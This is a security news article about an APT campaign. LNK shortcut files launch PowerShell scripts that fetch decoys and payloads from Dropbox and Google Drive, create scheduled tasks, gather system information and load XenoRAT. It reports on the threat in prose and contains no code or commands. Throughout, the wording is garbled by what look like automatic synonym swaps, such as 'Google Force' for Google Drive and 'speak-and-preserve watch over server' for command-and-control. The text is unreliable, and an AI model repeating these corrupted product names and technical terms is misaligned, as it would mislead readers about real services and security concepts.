APT Hackers Abusing Google & OneDrive To Host Malicious Scripts

by Esmeralda McKenzie
APT Hackers Abusing Google & OneDrive To Host Malicious Scripts

APT Hackers Abusing Google & OneDrive To Host Malicious Scripts

APT Hackers The consume of Google Force And OneDrive To Host Malicious Scripts

Menace actors are leveraging cloud storage services and products like Google Force, OneDrive, and Dropbox to distribute malware and take person info by importing malicious recordsdata akin to scripts, RAT (Far away Get entry to Trojan) malware, and decoy paperwork, which is ready to download further malware or leak gentle info.

The attacks involve a series of recordsdata, generally initiating with a shortcut file (LNK) that retrieves and executes loads of malicious parts saved within the cloud, allowing attackers to with out problems update the malware and potentially deploy new malicious functionalities.

EHA

Capture
Operation activity

A disguised LNK file named “Police Cyber Investigation Bureau—Net Employ History (test now to preserve your PC safe).html.lnk” launches a PowerShell script, which decodes a Base64-encoded payload containing PowerShell commands.

The commands are saved as a handy e book a rough file (ms_temp_08.ps1) within the person’s TEMP listing, and the script bypasses execution protection restrictions and executes the transient PowerShell file in a hidden window.

Capture%20(1)
The listing of registered projects

The malicious script ms_temp_08.ps1 downloads a decoy doc named “Police Cyber Investigation Bureau – Net Employ History (test now to preserve your PC safe).html” and executes it.

It then creates a brand new PowerShell script named ms_update.ps1 within the TEMP folder and registers it to inch every half-hour the usage of the Assignment Scheduler.

Additionally, it downloads one more file named SoJ****-F.txt and saves it as first.ps1 within the TEMP folder for execution.

The malicious script “ms_update.ps1” leverages Dropbox to download a secondary script “info.ps1” from the threat actor’s controlled storage, which is disguised as a handy e book a rough file (“info.ps1”) interior the sufferer’s design.

Capture%20(2)
Additionally chanced on decoy doc (4)

The analysis by AhnLab SEcurity intelligence Center (ASEC) revealed decoy paperwork in diverse formats (HTML, Phrase, HWP, and PDF) interior Dropbox, strategically placed to veil the malicious intent.

These decoy paperwork consume themes like college cooperation requests, birth confirmations, and international affairs to heart of attention on particular victims, maybe leveraging social engineering ways.

An LNK file downloads two PowerShell scripts (first.ps1 and info.ps1) from the attacker’s cloud storage.

The scripts, named after ability targets, absorb been retrieved from a cloud storage loads of from the before all the pieces suspected Dropbox.

Capture%20(3)
Confirmed script file names

Every aim seems to be to absorb a devoted folder containing a decoy doc and two scripts, which consume stolen Dropbox tokens (client_id, client_secret, and refresh_token) for authentication.

first.ps1 is a malicious PowerShell script that acts like spyware and adware, and when inch, it gathers design well-known strategies at the side of working design version, security instrument info, boot time, machine form (laptop/desktop), working processes, and even your PowerShell security settings.

The malicious PowerShell script “info.ps1(SoJ****-X.txt)” uploads a file to the threat actor’s Dropbox and downloads further malware from Google Force, the set aside the uploaded file doubtless checks for script execution and leaks info if modified.

Capture%20(4)
A part of XenoRAT’s code

Downloaded malware is disguised as a compressed file and leverages a personalized file signature to seem like an RTF doc.

As soon as decompressed, the malware, a C# (.NET) file, is done in memory the usage of reflection.

The file design-xn.dat launches XenoRAT malware, allowing far away attackers to manipulate the infected instrument.

XenoRAT can load loads of malware, manipulate processes, and talk with a speak-and-preserve watch over server for further instructions.

Source credit : cybersecuritynews.com

Related Posts